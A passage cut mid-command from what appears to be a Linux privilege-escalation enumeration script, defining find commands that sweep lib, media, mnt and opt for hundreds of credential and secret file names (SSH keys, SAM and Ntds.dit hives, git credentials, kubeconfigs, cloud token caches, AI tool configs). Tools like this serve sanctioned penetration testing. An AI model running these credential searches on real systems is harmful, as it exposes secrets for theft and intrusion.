\"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"ssh*config\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 772 FIND_LIB=`eval_bckgrd "find ${ROOT_FOLDER}lib -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"log4j-core*.jar\" -o -name \"rocketchat.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 773 FIND_LIB32=`eval_bckgrd "find ${ROOT_FOLDER}lib32 -name \"*.timer\" -o -name \"log4j-core*.jar\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 774 FIND_LIB64=`eval_bckgrd "find ${ROOT_FOLDER}lib64 -name \"*.timer\" -o -name \"log4j-core*.jar\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 775 FIND_MEDIA=`eval_bckgrd "find ${ROOT_FOLDER}media -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 776 FIND_MNT=`eval_bckgrd "find ${ROOT_FOLDER}mnt -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"sess_*\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 777 FIND_OPT=`eval_bckgrd "find ${ROOT_FOLDER}opt -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name 